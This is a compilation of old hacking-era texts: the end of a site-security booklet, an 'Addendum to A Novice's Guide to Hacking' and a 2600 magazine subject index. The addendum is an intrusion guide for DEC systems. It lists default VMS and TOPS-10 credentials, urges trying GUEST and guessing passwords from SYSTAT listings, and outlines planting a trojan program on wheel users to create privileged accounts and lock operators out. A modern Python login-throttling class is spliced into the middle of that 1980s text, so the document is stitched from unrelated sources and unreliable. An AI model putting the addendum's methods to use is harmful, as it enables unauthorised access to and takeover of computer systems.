In analysis of computing in sensitive environments, there are two
different security goals. The first is that of protecting the
system. All of the advice in this booklet should be considered
as a first step towards that goal. The second goal is the
protection of one’s job, or “Technical Compliance.” This is the
goal of showing that all of the regulations have been followed
and that protecting the system has been done with “due
diligence.”

It is important to realize that these two security goals are
separate and potentially conflicting. It may be necessary to
work towards the latter goal, and that is often more a legal
and bookkeeping question than a technical one. It is also beyond
the scope of this work.

D Handling the Press

Often media inquiries can absorb more time than all of the other
issues in incident handling combined. It is important to
understand this and to use your public affairs office if it
exists. In the excitement, people, especially those who are not
experienced speakers, will often forget that they are not empowered
to speak for the center and that nothing is ever really said
“off the record.”

D.1 Spin Control

The phrase “Spin Control” was first used in political circles.
It refers to altering the perceptions about an incident rather
than dealing with the facts of the incident themselves.
Consider the two statements.

1. To keep our machines safe, we decided to disconnect them
from the network.
2. We were forced to shut down our network connections to
prevent damage to our machines.

I have found that giving the press a statement like the former
tends to produce a laudatory piece about one’s staff, while a
statement like the latter produces an embarrassing piece. The
two statements are of course essentially identical.

Your public affairs group is probably familiar with these issues
and can help you form press statements.

D.2 Time Control

With a sufficiently large incident, the media attention can
absorb almost unbounded amounts of time. The press will often
call employees at home. It is important that the staff who are
solving a problem understand that solving the incident is
more important than dealing with the press. At the very least,
insist that all press representatives go through the public
affairs office so that the standard questions can be answered
easily and time-efficiently.

D.3 Hero Making

The press likes to find outstanding heroes and villains. As a
result, the media will tend to make one of your staff members
into a hero if it is at all possible for them to do so. It is more
likely than not that the hero will not be the person who has
worked the hardest or the longest.

D.4 Discouraging or Encouraging a Next Incident

The attention that an incident receives greatly affects the
likelihood of future incidents at that particular site. It
probably also influences the decision process of potential future
crackers in the community at large. Claiming that your site is
invulnerable is an invitation to a future incident. Giving the
media step by step instructions on how to break in to a computer
is also not a wonderful idea.

I (personally) suggest stressing the hard work of your staff and
the inconvenience to the legitimate users and staff members. To
the extent practical portray the cracker as inconsiderate and
immature and try to avoid making him seem brilliant at one
extreme or the attack seem very simple at the other.

D.5 Prosecution

If you are considering prosecution, you need to consult with your
legal counsel and law enforcement officials for advice on press
handling.

D.6 No Comment

One common strategy for avoiding (or at least bounding) time loss
with the press is to simply decline to comment on the situation
at all. If you are going to adopt this approach, your public
affairs office can advise you on techniques to use. It is
important to tell everyone who is involved in the incident that
they should not discuss the situation; otherwise people will leak
things accidentally. Also, without correct information from your
center, the press may print many inaccurate things that represent
their best guesses.

D.7 Honesty

I recommend against trying to mislead the press. It is hard to
keep a secret forever and when and if the press finds that you
have lied to them, the negative coverage that you may receive
will probably far exceed the scope of the actual incident.

E Object Code Protection

To keep object code safe from human attackers and viruses, a
variety of techniques may be employed.

Checksums. Saving the checksums of each of the system files in a
protected area and periodically comparing the stored checksums
with those computed from the file’s current contents is a
common and moderately effective way to detect the alteration
of system files.

Source Comparisons. Rather than just using a checksum, the
complete files may be compared against a known set of
sources. This requires a greater storage commitment.

File Properties. Rather than computing a checksum, some facilities
store certain attributes of files. Among these are the
length and location on the physical disk. While these
characteristics are easy to preserve, the naive attacker may
not know that they are important.

Read-Only Devices. Where practical, the system sources should be
stored on a device that does not permit writing. On many
systems disk partitions may be mounted “Read-Only.”

Dates. On many systems the last modification date of each file is
stored and recent modifications of system files are reported
to the system administrator.

Refresh. Some systems automatically re-install system software
onto their machines on a regular basis. Users of TRACK
often do this daily to assure that systems have not been
corrupted.

F The Joy of Broadcast

The majority of the local area nets (LAN’s) use a system called
broadcast. It is somewhat like screaming in a crowded room.
Each person tends to try to ignore messages that weren’t meant
for them.

In this type of environment, eavesdropping is undetectable.
Often passwords are sent unencrypted between machines. Such
passwords are fair game to an attacker.

Various cryptographic solutions including digital signatures and
one time keys have been used to combat this problem. Kerberos,
developed at the MIT Athena project, is available without cost and
presents one of the few promising potential solutions to the
broadcast problem.

G Guest Accounts

The computer center guest policy is among the most hotly debated
topics at many computer centers. From a security standpoint, it
should be obvious that an attacker who has access to a guest
account can break into a computer facility more easily.

G.1 Attack Difficulty Ratios

Basically it is a factor of ten easier to break into a machine
where you can easily get as far as a login prompt than one where
you can’t. Being able to reach the machine through a standard
networking discipline and open connections to the daemons is
worth another order of magnitude. Access to a machine that is
run by the same group is worth another factor of three, and access
to a machine on the same LAN would grant a factor of three beyond
that. Having a guest account on the target machine makes the
attack still another order of magnitude easier.

Essentially, having a guest account on the target simplifies an
attack at least a thousand fold from having to start cold.

G.2 Individual Sponsors

I strongly suggest requiring each guest to have an individual
staff sponsor who takes responsibility for the actions of his
guest.

G.3 The No Guest Policy

In centers that prohibit guests, staff members often share their
passwords with their guests. Since these are generally
privileged accounts, this is a significant danger.

H Orange Book

You have doubtlessly by now heard of the “Orange Book” and
perhaps of the whole rainbow series.

Much of the “Orange Book” discusses discretionary and mandatory
protection mechanisms and security labeling. Another section
deals with “covert channels” for data to leak out. While most
of these issues are not important in a university, the ideas of
protecting password files (even when encrypted), individual
accountability of users and password aging are worth implementing
in an unclassified environment.

I Acknowledgements

— Help of a lot of people. — copies were sent out to 48 people
for peer review

Jerry Carlin. For examples from his training course.
Joe Carlson. For help with spelling and grammar.

James Ellis. For help with organization.

Alan Fedeli.
Paul Holbrook. For help getting this document distributed.

David Muir. For help with spelling, grammar and comments about
computer games.

Kevin Oberman. For help with VMS issues, spelling and grammar.
Mike Odawa. For help with the microcomputers section.

An Addendum to A Novice’s Guide to Hacking, by The Mentor

This file is an addendum to "A Novice's Guide To Hacking" written by "The
Mentor".  The word "hacking" is here used the way the non-hacking public
thinks it is used, to mean breaking into somebody else's computer.  Its
purpose is to expand and clarify the information about the TOPS-20 operating
system, which runs on DECsystem-20 mainframes.  The Mentor basically lumped
this system in with TOPS-10 and didn't note important differences between the
two.  I will here reproduce in full what The Mentor had to say about TOPS-10
and about VMS, which are the parent and the offspring of TOPS-20.

VMS-       The VAX computer is made by Digital Equipment Corporation (DEC),
           and runs the VMS (Virtual Memory System) operating system.
           VMS is characterized by the 'Username:' prompt.  It will not tell
           you if you've entered a valid username or not, and will disconnect
           you after three bad login attempts.  It also keeps track of all
           failed login attempts and informs the owner of the account next time
           s/he logs in how many bad login attempts were made on the account.
           It is one of the most secure operating systems around from the
           outside, but once you're in there are many things that you can do
           to circumvent system security.  The VAX also has the best set of
           help files in the world.  Just type HELP and read to your heart's
           content.
           Common Accounts/Defaults:  [username: password [[,password]] ]
           SYSTEM:     OPERATOR or MANAGER or SYSTEM or SYSLIB
           OPERATOR:   OPERATOR
           SYSTEST:    UETP
           SYSMAINT:   SYSMAINT or SERVICE or DIGITAL
           FIELD:      FIELD or SERVICE
           GUEST:      GUEST or unpassworded
           DEMO:       DEMO  or unpassworded
           DECNET:     DECNET

DEC-10-    An earlier line of DEC computer equipment, running the TOPS-10
           operating system.  These machines are recognized by their
           '.' prompt.  The DEC-10/20 series are remarkably hacker-friendly,
           allowing you to enter several important commands without ever
           logging into the system.  Accounts are in the format [xxx,yyy] where
           xxx and yyy are integers.  You can get a listing of the accounts and
           the process names of everyone on the system before logging in with
           the command .systat (for SYstem STATus).  If you see an account
           that reads [234,1001]   BOB JONES, it might be wise to try BOB or
           JONES or both for a password on this account.  To login, you type
           .login xxx,yyy  and then type the password when prompted for it.
           The system will allow you unlimited tries at an account, and does
           not keep records of bad login attempts.  It will also inform you
           if the UIC you're trying (UIC = User Identification Code, 1,2 for
           example) is bad.
           Common Accounts/Defaults:
           1,2:        SYSLIB or OPERATOR or MANAGER
           2,7:        MAINTAIN
           5,30:       GAMES

**** note:  I'm remembering this stuff from several years ago, and in some
cases my memory may be foggy or stuff may be outdated.

TOPS-20, once you are inside, resembles VMS much more than it resembles  
TOPS-10, as far as I know (I'm not really familiar with VMS).  From the
outside, it's more like TOPS-10, except that the prompt is a @ instead of a
period.  You can enter many commands without logging in, including SYSTAT and
probably FINGER.  (Sometimes you can even use the mail program without
logging in.)  It is very helpful.  Not only does the command HELP lead to
lots of useful information, but anywhere in typing a command you can press ?
and it will tell you what the format of the command expects.  For instance,
if you type ? by itself, it will tell you all the words that a command can
begin with.  If you type S?, it will tell you all the commands that start
with the letter S.  If you type SYSTAT ?, it will tell you the options
available on the systat command.  You can use this at any point in any
command.  Furthermore, if there is only one possibility (you have typed a
unique abbreviation), you can press Escape and it will finish the word for
you.  I'm not sure, but I think TOPS-20 was the system that first introduced
filename completion as well --turning a uniquely abbreviated filename into a
complete name when you press escape, beeping if the abbreviation is not
unique.  With command keywords you can leave the abbreviation un-expanded,
with filenames you have to expand it (or type it all in) for it to work.

Use the "Login" command to log in, followed by a username.  It will prompt
for a password.  Note that a password can be something like 39 characters
long, as can the username itself.  TOPS-20 does NOT use numbers like 317,043
for user IDs.  (Note that these numbers in TOPS-10 are octal, not decimal.) 
Furthermore, the password can contain spaces.  So, if somebody wants to make
his password difficult to guess, he can easily do so.

(But sometimes they might get overconfident.  I remember a story from
Stanford...  Someone asked the large cheese if he would let him know what the
operator password was, and he said "The operator password is currently
unavailable."  So the guy tried "currently unavailable" as a password, and
got in.  (Which reminds me of the time they got a real bug in the system
there...  a head crash caused by an ant on the disk platter.))

In general, TOPS-20 does not limit the number of login attempts, nor does it
keep a record of bad tries.  However, it is not difficult for the local
management to add such measures, or others such as a delay of several seconds
after each attempt.  And unlike Unix, it is difficult to evade these even
once you're in.  Without heavy in-depth knowledge, you can't test a username-
password combination except through a system call, which will enforce delays
and limited failures and such against password-trying programs.

So, TOPS-20 is easy to defend against the "database hack", in which you try
many different common passwords with many different usernames.  (Unix is
much more vulnerable to this.)  But any particular system, especially a lax
one like a college machine (DEC is always popular in academia), might have
little defense here.  But you might not know how much defense until too late.
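The following Python is an added, defender-side illustration (not part of this addendum, and not code from VMS or TOPS-20) of the login accounting described above: bad attempts are counted per account and reported to the owner at the next successful login, the session is dropped after three bad tries, and the post-failure delay is enforced inside the one verify call that every password check must pass through. All account names, passwords and limits are constructed.

```python
"""Login throttling and failed-attempt accounting enforced inside one
authentication routine. Constructed illustration modelled on the behaviour
the text ascribes to VMS and TOPS-20; not code from either system."""
from __future__ import annotations

import hashlib
import hmac
import os
import time
from dataclasses import dataclass


@dataclass
class Account:
    salt: bytes
    digest: bytes
    failed_since_last_login: int = 0   # reported to the owner at next login
    not_before: float = 0.0            # attempts before this time are refused


@dataclass
class LoginResult:
    username: str
    failed_attempts_since_last_login: int


class DisconnectedError(Exception):
    """The session exceeded the permitted number of bad attempts."""


class Authenticator:
    MAX_PER_SESSION = 3      # VMS-style: drop the line after three bad tries
    DELAY_SECONDS = 5.0      # TOPS-20-style: wait after each failure
    ITERATIONS = 50_000      # PBKDF2 work factor (constructed value)

    def __init__(self, clock=time.monotonic):
        self._clock = clock          # injectable, so tests need not sleep
        self._accounts = {}
        self.audit_log = []          # the record of bad tries TOPS-10 lacks
        # Dummy credential for unknown usernames: same cost, same answer,
        # so the response does not reveal whether the username exists.
        self._dummy_salt = os.urandom(16)
        self._dummy_digest = self._hash("", self._dummy_salt)

    @classmethod
    def _hash(cls, password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, cls.ITERATIONS)

    def add_account(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self._accounts[username] = Account(salt, self._hash(password, salt))

    def new_session(self) -> Session:
        return Session(self)

    def verify(self, username: str, password: str) -> LoginResult | None:
        """The single choke point: every password check passes through here,
        so a password-trying program cannot sidestep the delay or the count."""
        now = self._clock()
        acct = self._accounts.get(username)
        if acct is not None and now < acct.not_before:
            # Inside the post-failure delay: refuse without checking, so rapid
            # guessing gains nothing. Not counted as a further failure.
            self.audit_log.append(f"{username}: attempt refused during delay")
            return None
        if acct is None:
            salt, digest = self._dummy_salt, self._dummy_digest
        else:
            salt, digest = acct.salt, acct.digest
        matches = hmac.compare_digest(self._hash(password, salt), digest)
        if acct is None or not matches:
            if acct is not None:
                acct.failed_since_last_login += 1
                acct.not_before = now + self.DELAY_SECONDS
            self.audit_log.append(f"{username}: bad login attempt")
            return None
        count, acct.failed_since_last_login = acct.failed_since_last_login, 0
        self.audit_log.append(f"{username}: login ok after {count} bad attempts")
        return LoginResult(username, count)


class Session:
    """One connection; drops the caller, VMS-style, at the attempt limit."""

    def __init__(self, auth: Authenticator):
        self._auth = auth
        self.failures = 0
        self.disconnected = False

    def login(self, username: str, password: str) -> LoginResult | None:
        if self.disconnected:
            raise DisconnectedError("session already disconnected")
        result = self._auth.verify(username, password)
        if result is None:
            self.failures += 1
            if self.failures >= Authenticator.MAX_PER_SESSION:
                self.disconnected = True
                raise DisconnectedError("too many bad login attempts")
        return result
```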

Do try the GUEST username.

But TOPS-20 can be very vulnerable to trojan horses.  See, there's this thing
called the Wheel bit.  A username that has the Wheel property can do anything
the system operator can do, such as ignore file protection masks, edit the
disks at the track/sector level, change any area of memory...  On Unix, only
one user, the superuser, can read and write protected files.  On TOPS-20, any
user can do these things from any terminal, if the Wheel attribute is set in
his user data.  Some campus computers tend to accumulate excess trusted users
with wheel bits, and have to periodically prune away the unnecessary ones.

The thing is that a wheel can do these things without knowing that he has
done them.  Normally the privileged commands are deactivated.  But a program
run by a wheel can activate the privileges, do anything it wants, cover its
tracks, and deactivate them without the user ever being the wiser.  So if you
can get any wheel user to run any program you wrote, such as a game or small
utility...  there's no limit to what you can do.  In particular, you can
create a new username, and make it a wheel.  Or you can simply ask the system
outright for someone's password, if I'm not mistaken.  (All this requires
access to TOPS-20 programming manuals, but some of the necessary material
should be available on line.)  You cannot actually conceal this creation, as
far as I know...  but maybe with sophisticated enough knowledge you could
make it not immediately apparent...  Anyway, once you get that far in, you can
probably keep one step ahead of them for a while...  If they erase your new
accounts, you can use the passwords to old ones...  They can change all of
the wheel passwords, but a lot of the regular users won't change for some
time...  You could even lock the operators out of their own system by
changing all their passwords for them, if you were crazy enough, perhaps
forcing them to shut the machine down to regain control of it.  They might
even have to restore stuff from tape backup.

Even if you don't wedge your way into secret stuff, a TOPS-20 system can be
fun to explore.  It's much more novice-friendly than most systems, and much
more hacker-friendly as well.  I think the ascendancy of Unix as the least-
common-denominator OS that everybody can agree on is a definite loss,
compared to TOPS-20.

2600 Subject Index Volumes 1 (1984) – 10 (1993) by David Price

Subjects are shown in the first column; citations are listed in the
second column in the following format:
V(N):P  V = Volume, N = Number, P = Page

(L) Indicates a letter

00                              4(9):6
10698                           7(1):30(L)
(201)                           6(2):20
202 bug                         3(9):65
2600 Magazine                   1(1):1, 2(8):51, 4(12):3
2600 meetings                   10(2):17, 10(2):16, 10(4):35, 7(1):38,
                                10(1):43, 10(3):18, 9(4):4 
2600--voice bbs                 9(3):40(L)
2600--BBS                       2(2):9, 2(8):49
4TEL                            6(3):20
(516)                           5(3):14
540s                            8(1):19
550 blocking                    4(11):8
"606 Emergency"                 5(1):24(L)
6.5536 crystal                  7(3):32
*69                             9(2):31
(707)                           7(1):44
800s                            6(1):12, 2(6):37, 6(1):12
800--DTMF recognition           3(12):92(L)
800--tariffs                    2(1):4(L)
800--translation table          6(1):12
8038 chip                       4(12):22(L), 4(10):12(L)
900s                            2(11):79
900 translation table           6(1):12
911                             1(10):57, 7(1):37
911--documents                  7(2):4
959 Numbers                     4(5):8
97*s                            4(10):4
976 scam                        4(7):8
976 social interactions         4(12):17
9999-suffixes                   1(1):4
access                          3(11):84(L)
ACD                             9(3):28(L)
ACM SIGSOFT                     4(11):13(L)
acronym maker                   4(1):13(L)
acronyms                        10(1):34, 10(2):20, 2(2):11, 10(3):44,
                                8(1):42
ACTS                            6(1):30, 1(11):62
ADS                             1(9):53, 1(5):2, 1(1):2 
ADS--Investigation              1(2):9
Albania                         7(1):23
Allah Akbar!                    3(11):86
Allnet                          5(2):2, 4(6):4
alliance                        2(5):26
American Express--hacking       3(3):17
AmiExpress--hacking             9(3):4
ANAC Guide                      7(3):39
ANI Hunting                     4(1):18(L), 3(11):84
ANSI Bomb                       10(2):44
answer supervision              3(9):65
anti-hacker propaganda          2(1):1, 7(2):11
AOS                             5(3):10
Approaching Zero Book Review    10(3):38
ARPANet                         1(6):1
Area Code Expansion             1(3):3
ARPANet military subnet         1(3):5
Arpanet                         4(9):4
arrests...see busts
AT&T Break-up                   1(6):4, 2(11):74
AT&T failure                    6(4):4
AT&T Shutdown                   6(4):4
AT&T Strike                     1(4):1
AT&T Thought Police             2(11):79
ATM III                         4(6):12(L)
ATMs                            1(4):3, 4(7):8
ATMs, Book Reviews              4(2):21
atomic bomb                     1(3):4
ATT Addresses                   9(4):36
Australian phone system         9(1):31
Automatic Call Distributor      9(3):28(L)
AUTOVON                         3(5):37, 4(6):18(L), 3(3):17, 6(1):7, 9(4):19
baby bells                      1(7):3
back doors                      2(1):2
bank records                    1(5):3, 2(7):42
BASIC                           3(1):5
BASIC dialer program            5(1):20
basic phreaking Q & A           6(2):29(L)
BASIC Red Box Tones             5(3):22
basic terms                     4(5):13(L)
BBS Disclaimers                 4(7):12(L), 4(10):16
BBS--Government                 10(2):39
BBS--Protecting a User Log      3(2):16(L)
beepers                         4(11):12(L)
Bell computers                  9(4):42
Bell Routing Codes              5(1):42
Bellco cops                     5(1):22
Bellcore Publications           3(5):36
Best Boast                      5(1):24(L)
Big Brother                     3(12):91, 9(1):42, 8(4):8, 1(12):68, 7(3):16,
                                1(8):44
billing signals                 3(9):65
BIN list                        8(2):31
BITnet                          2(1):6, 4(9):4
black band                      4(11):7
BLV (Busy Line Verification)    5(3):27(L), 8(4):42, 4(12):10
bogus tap-check number myth     4(2):13(L)
Box--Beige                      5(4):42, 10(1):14, 10(3):9
Box--Blue                       3(2):12(L), 2(10):69, 9(4):33, 2(2):7,
                                3(5):36(L), 10(3):9, 6(1):25(L), 3(5):38
Box--Clear                      1(7):4
Box--Combo                      9(3):13
Box--General info               10(3):9, 5(1):16
Box--Green                      7(1):29 (L), 10(3):9
Box--Rainbow                    10(3):9, 9(2):15
Box--Red                        5(2):13, 10(2):42, 7(3):32, 8(3):43, 10(3):9
                                9(3):13
Box--Silver in U.K.             7(1):19
Box--Silver                     6(4):20, 9(4):19, 9(1):16, 10(3):9, 1(11):64(L),
                                3(3):17
Box--White                      2(4):19, 10(3):9
Box--yellow                     10(3):9
braille computer                3(12):95
British Telecom                 8(2):35
British Payphones               4(10):17(L)
busts                           4(3):18, 4(7):18(L), 6(2):26(L), 4(7):6,
                                2(5):27, 1(7):7, 3(12):91, 2(2):9, 8(4):36,
                                1(10):55, 10(4):4, 8(3):4, 7(3):44, 8(2):4,
                                4(8):3, 8(4):8, 7(3):10, 7(1):3, 6(1):3,
                                8(1):11, 8(2):12, 8(1):11, 6(2):34, 9(2):22
Busy Line Verification...see BLV
busy                            10(4):9
busy--"fast busy tones"         5(2):27(L)
busy--busy verification         3(10):80(L)
cable descrambling              10(1):16, 3(8):63
cable vaults                    7(4):12
Call Forwarding, Diverting      2(10):65
Call-Waiting Phone Tap          6(3):27
callback verification           9(3):9
Caller ID                       3(12):91, 8(1):19, 9(2):18, 7(3):5, 10(3):12,
                                8(2):22, 8(2):35
Caller ID--and Cell Phones      10(3):42
calling cards                   1(4):3, 1(6):3, 1(1):3, 1(2):9
call records (ESS)              1(2):8
call traces (ESS)               1(2):8
canning                         3(10):76(L), 5(4):42
Captain Crunch                  4(3):4
Captain Midnight                3(9):68(L)
Captain Zap's sins              5(2):24(L)
card copiers                    8(2):7
Carrier Access Codes            6(3):42
CCCP                            3(3):23
CCIS                            4(11):12(L), 2(2):7, 4(5):6
CCITT                           9(2):10
CD-ROM                          3(12):95
cellular biopsy                 10(4):6
cellular fraud bust             4(4):8
cell frequencies                4(1):10, 10(1):4, 4(7):13(L)
cellular modem                  3(5):35
cellular phones                 2(11):79, 5(3):8, 10(4):6, 4(6):8, 3(12):89,
                                4(2):13(L), 4(2):8, 10(3):42, 4(7):4,
                                3(11):90, 10(1):4
cellular phones--history        3(11):90
Central Offices                 2(3):14, 7(4):12
Central Office IDs              4(10):14
Chaos Computer Club             5(4):34
China                           3(8):63
Chinese dial-a-narc             6(2):35
CIA                             1(12):68, 1(8):46(L)
Carrier Identification Codes    1(11):65
CIC                             7(1):8
CID... see Caller ID 
ciphers                         9(4):6
CLASS features                  8(4):31, 8(2):22, 4(5):6 
CLLI codes                      4(10):14
CN/A                            3(9):72(L), 4(8):12, 2(3):18
CNA--Lists                      4(4):10
CND                             8(2):22
CO Magazine                     4(9):22
COCOTS                          6(4):27(L), 7(2):20, 7(4):27(L), 8(2):28(L),
                                8(3):25(L), 9(3):13, 8(1):19, 4(11):8,
                                8(2):35
COCOT--database list            8(4):33 
COCOT--numbers                  8(3):22
COCOT--refund letters           8(4):33
COCOT--tricks                   7(3):27(L)
codes                           9(4):6
codes--methods                  1(3):2
coin boxes                      5(3):10
coin-test number                4(4):20(L)
COLTs                           6(3):20
commentary                      2(8):50
Common Language Location Identifier...see CLLI
Communications Fraud Control 
 Association                    7(4):43
competition                     6(3):3
Compuserve                      3(10):75
Computel                        2(3):15
Computel scam                   3(2):12(L), 4(4):4, 3(5):34
computer confiscation           2(8):54
computer lore                   9(2):40
computer shows                  10(4):16
computer threat                 1(6):3
conferences                     10(3):4
Congress--paranoia              10(3):4
CONSUS                          6(1):7
cop watching                    9(1):7
cordless phones                 1(1):3, 6(2):22, 7(1):19 
Cornwall, Hugo                  4(2):4
corvis hacking                  4(11):12(L)
COSMOS                          2(2):8, 6(3):13, 4(2):6, 4(3):10, 2(12):82,
                                7(1):8
COSMOS--abbreviations           4(3):10
COSMOS--demise                  6(3):13
COSMOS--documentation           4(2):6
COSMOS--history                 4(3):10
COSNIX Operating System         4(2):6
Country codes                   1(2):10, 3(7):53
couplers                        9(2):4
court news                      3(4):27, 2(4):21, 1(4):3, 1(6):3, 8(4):36,
                                1(5):3
covering tracks                 4(7):6
covert radio broadcasts         4(11):7
CPA-1000                        4(8):12(L)
credit card algorithms          7(3):42
credit files                    10(1):42
Cross-Bar--oddities             3(3):20(L)
crypt preview                   8(3):44
crypt() source code             8(4):11
current events                  3(3):22
customs                         8(2):35
"Cyberpunk" fictions            8(2):42
DAST                            10(4):22
data transmission--quality      3(9):71
DCS                             3(3):17
DEC-20--hacking                 2(7):41
(DEC)PDP                        3(4):25
Defense Communications Agency   5(1):24(L)
Defense Data Network listing    1(5):4
Denning, Dorothy                7(3):10
Department of Justice           9(2):22
deregulation                    1(7):3
dial back security              3(2):10
Dialed Number Recorder--see DNR
dialer--demon                   9(2):15
dialer programs                 5(1):20
dialing * on rotary phones      3(12):96
dialup numbers                  4(8):6
Dicicco, Lenny                  8(2):42
digital lock combinations       10(4):38
Direct Analog Storage Technology...see DAST 
direct dialing                  4(3):8
directories                     2(5):27, 3(12):95
Directory Assistance
 --usage fees                   1(2):9
Disney radio frequencies        9(1):17
divestiture                     3(1):1
DMERT                           10(2):4, 8(4):45
DMS 100                         1(7):3(L), 10(4):10
DNIC (Data Network ID Codes)    7(1):40
DNR                             7(3):16
DOCKMASTER break in             5(3):20
DoD                             3(3):19
DSM                             6(4):14
DSS1                            10(3):36
DTMF dialers                    8(3):43
DTMF decoder                    7(1):14, 10(2):14
DTMF overview                   9(2):10
dumpster diving                 1(2):10, 2(2):8, 1(9):50
Duophone CPA-1000               4(5):22
Dutch hackers                   8(3):4
E-Card                          4(5):8
E-COM                           1(6):3, 1(6):5
EASYnet                         8(2):18
Electronic Freedom Foundation   7(2):10
Electronic Privacy Act          4(6):8, 4(4):8
electronic surveillance--NSA    2(12):83
email systems                   1(12):71
Emergency Interrupts            4(12):10
encryption                      3(4):31, 3(10):79, 2(1):3, 9(4):6
equal access                    4(5):17(L), 4(3):6, 4(3):8, 4(12):20
errata for 4(9)                 4(10):18
ESN                             10(4):6, 10(1):4, 10(3):42, 4(7):4 
espionage                       2(3):15
#1ESS                           7(4):12, 10(4):10
#4ESS                           7(4):28(L)
#5ESS switch                    10(2):4, 10(4):10, 8(4):45, 8(4):45
ESS                             3(10):79, 1(2):8, 1(6):2, 6(1):25(L),
                                2(11):74, 1(7):3, 10(4):10
ESS Bust methods                1(7):3(L)
essay                           2(12):81, 1(12):67, 7(4):32
European phone systems          4(5):9
exchanges                       3(8):62
Falwell, Jerry                  5(1):25, 5(2):39, 3(1):3
Farrell's Ice Cream-covered 
 narcs                          1(8):45
fax taps                        9(1):42
FAX                             4(5):14
ftp tricks                      8(3):14
FBI                             3(11):83, 3(10):75, 3(9):67, 1(11):63,
                                9(2):22, 1(1):2, 4(8):9, 1(1):3
FCC                             4(6):8, 3(9):71, 1(6):3
*features                       8(4):31
Feds                            9(2):38
feeder groups                   5(3):4
fiber-optics laid 
 along rails                    3(6):48(L)
finger monitor program          9(1):35
fingerprints                    3(12):95
FM wireless transmitter--plans  8(4):44
fortress fones...see pay phones 
Frame Room                      7(4):12
France                          2(12):83
gangs                           7(4):36
GBS                             4(10):4
GEISCO                          2(1):3
general phone rants             4(1):20
Germany                         2(12):87
Gore, Albert                    5(1):26(L)
grade hacking                   10(2):13, 10(4):15, 10(3):34, 6(4):45,
                                6(3):4
GTD#5                           2(11):73
GTE--Telemail                   1(1):3
GTE Telcos                      6(3):33
Gulf War printer virus          8(4):39
"Hacker"                        9(1):36
Hacker Con                      6(3):10
The Hacker Crackdown            9(3):21
hacker morality                 2(6):34
hacker scares                   9(4):4
hacker sourcebooks              1(11):64(L)
hacker study                    10(1):38
hacker video                    8(3):14
Hacker's Handbook               4(2):15, 4(2):4
hackers credo                   1(3):1, 9(4):17
hackers in hiding               8(3):24(L)
hacking beginnings              9(3):42
hacking history                 5(1):16
hacking lore                    8(4):16, 2(8):52, 5(1):24(L), 4(2):13(L)
hacking reading list            7(4):6
hacking recycling machines      1(2):9
hacking statistics              3(6):41
Hack-Tic                        9(2):15
harmonica bug                   2(9):58
HBO                             3(10):75
Hess, Mark                      7(1):45
high school hacking--news       1(3):3
history--phreaking UK           1(9):49
Hoffman, Abbie                  4(1):4
         --Obituary             6(2):3
Holland's hackers               2(4):21
home monitoring                 1(4):2
honesty tests                   10(3):20
HP2000--hacking                 2(3):20
human database centers          8(4):46
humorous defense against 
 telco threats                  2(2):10(L)
IBM                             1(1):2
IBM's Audio Distribution 
 System                         1(5):2
IC                              1(11):65
ICLID                           7(3):5
ICN                             3(11):81
IMAS                            4(10):4
IMTS                            3(4):26, 3(12):89
In-Band Signaling               2(2):7
India                           3(9):67
induction coil--plans           7(3):36
infinity transmitter            2(9):58
information manipulation        9(4):17
INSPECT                         8(2):18
Intelpost                       1(5):3
internet dialups                10(4):32
internet outdials               8(1):40
internet worm                   5(4):4, 6(3):39
Interoffice Signalling          7(4):12
intro to hacking                2(6):40
IRS                             3(2):15, 3(10):79, 2(1):3, 2(3):15, 2(6):35
ISDN                            10(3):36, 8(1):42 
Israel--phone system            2(6):33, 4(4):16
Israeli computer surveillance 
 of West Bank                   4(12):8
Italian hackers                 4(12):18
ITT 2100 switch                 4(7):12(L)
ITT--boxing                     3(5):38
I've fallen and I can't 
 get up                         3(9):67
Jackson, Steve                  10(2):45, 10(1):18
jail                            10(4):4
JANET                           4(9):4
Kenya                           2(3):15
Kiev                            3(6):47
KKK--racist BBS systems         2(1):3
Kranyak, Jack                   3(5):34, 4(4):4
Landreth, Bill                  4(9):12(L)
laptop tone generation          9(4):45
laptops                         1(2):9, 9(2):4
LASS System                     4(5):6
law enforcement--confiscation   2(8):54
LD Carriers                     4(12):20
LD Fees                         1(5):3
LEC                             8(1):42
legalistic banter               2(1):4(L)
Legislative Network             7(4):4
letter sorting machines         8(3):32, 8(4):32
lineman's handset               10(1):14
LODCOM compilation review       10(3):19
loop number patterns            4(1):12(L), 1(9):52(L)
loop testing                    6(3):20
magnetic card tricks            9(1):27, 8(4):40(L), 8(2):7
mail drops                      7(3):29(L)
manholes                        5(3):4, 7(4):12
Marcos                          3(4):27
marine radio ch 26              7(1):19
Marquee                         3(3):19
Max Headroom-Chicago style      4(12):8
MCI Mail--hacking               1(12):67, 1(7):2
MCI Numbers                     1(4):5
MCI scam                        5(4):10
MCI                             6(1):36, 1(3):2, 8(2):16
media hype                      8(3):4
merchant ship calls             2(6):36(L)
MF tones                        2(3):16(L)
microwave links                 1(3):2
MicroVAX                        3(9):71
military computers              5(1):24(L)
MILNet                          2(7):45
MIN                             4(7):4
Minitel                         4(9):8, 9(4):8
missile systems                 2(4):21
Mitnick, Kevin                  7(1):3, 6(1):3, 6(3):14, 8(2):42
MIZAR                           7(1):8
mobile hacking                  9(2):4
mobile telephone freqs          6(3):24(L), 8(4):18, 3(4):26
monitoring microwave            5(1):4
Morris, Robert                  6(3):14, 6(4):6, 7(1):23
motivation--hackers             1(3):1
MTSO                            3(12):89
MPOW                            4(5):12(L)
narcs                           9(2):38, 1(11):64(L)
National Coordinating Center    5(1):24(L)
Navy                            3(10):75
Nazi BBS                        2(3):13
NCCCD                           3(6):41
Neidorf, Craig                  7(1):3, 7(2):4, 7(2):3, 7(2):8, 7(3):44,
                                8(4):36
neo-Nazi games                  8(2):12
net addresses                   2(4):23, 3(11):82
Network 2000                    7(3):8
news                            4(10):8, 5(1):37, 9(4):19, 4(11):8
new services                    8(2):35
non-supervised phone lines      3(6):44(L)
Nothing New in 
 Computer Underground           3(6):42
NPA count                       6(4):44
NSA                             2(10):67, 1(9):51, 2(7):47, 1(10):57,
                                3(9):67, 5(3):20, 2(12):83, 3(10):79
NSA's Phone Number              2(3):16(L)
NUAs--international             4(10):10
nuclear free America            4(3):2
numbers                         4(12):21, 5(2):44, 9(1):45
NY Tel                          4(7):15
Nynex exchange addresses        10(4):18
NYNEX                           8(2):11, 6(4):9, 6(3):36
NYNEX--Radio Frequencies        8(2):32
NYNEX--switch guide             6(4):9
obit--David Flory AKA Dan 
 Foley AKA The Shadow           6(2):45
    --Abbie Hoffman             6(2):2
